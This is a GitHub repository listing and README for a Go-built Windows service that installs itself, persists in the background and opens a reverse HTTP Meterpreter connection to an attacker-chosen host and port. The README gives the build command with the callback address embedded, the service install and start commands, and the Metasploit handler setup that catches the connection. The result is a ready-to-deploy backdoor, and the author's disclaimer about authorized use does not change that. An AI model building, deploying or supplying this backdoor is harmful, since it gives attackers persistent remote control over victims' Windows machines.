https://github.com/mauri870/powershell-reverse-http
:innocent: A Powershell exploit service that opens a reverse http connection via meterpreter
metasploit-framework meterpreter service windows
- Host: GitHub
- URL: https://github.com/mauri870/powershell-reverse-http
- Owner: mauri870
- Created: 2016-08-17T13:28:34.000Z (over 9 years ago)
- Default Branch: master
- Last Pushed: 2023-02-25T07:22:10.000Z (almost 3 years ago)
- Last Synced: 2023-11-07T17:14:56.121Z (about 2 years ago)
- Topics: metasploit-framework, meterpreter, service, windows
- Language: Go
- Homepage:
- Size: 9.77 KB
- Stars: 116
- Watchers: 13
- Forks: 50
- Open Issues: 5
Metadata Files:
- Readme: README.md
README
## Powershell Reverse Http
> Note: Use this program at your own risk. I do not encourage in any way the use of this software illegally or to attack targets without their previous authorization.
> Meterpreter-like backdoors are a pretty common attack vector and most decent antiviruses detect this behavior as a virus.
A simple Windows service that runs in the background and connects to a Meterpreter session over HTTP.
### Usage
First, you need [Go](https://golang.org/dl/) to build the binary (duh!) and [metasploit-framework](https://github.com/rapid7/metasploit-framework) to accept the reverse connection:
```
git clone https://github.com/mauri870/powershell-reverse-http.git
cd powershell-reverse-http
env GOOS=windows go build -ldflags "-X main.LHOST=10.10.10.2 -X main.LPORT=3000" -o powershell-reverse.exe
```
Change `LHOST` and `LPORT` to match your Metasploit handler.
## Usage
```
powershell-reverse.exe
no command specified
usage: powershell-reverse.exe <command>
where <command> is one of
install, remove, debug, start, stop, restart, pause or continue.
```
After install and start, the service stays up and keeps trying to connect to the host and port specified in `exploit.go`.
On the attacker's machine:
```
./msfconsole --quiet
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf exploit(handler) > set LHOST YOUR_IP_ADDRESS_HERE
LHOST => YOUR_IP_ADDRESS_HERE
msf exploit(handler) > set LPORT YOUR_PORT_TO_AWAIT_CONNECTION_HERE
LPORT => YOUR_PORT_TO_AWAIT_CONNECTION_HERE
msf exploit(handler) > exploit
[*] Started HTTP reverse handler on http://LHOST:LPORT
[*] Starting the payload handler...
```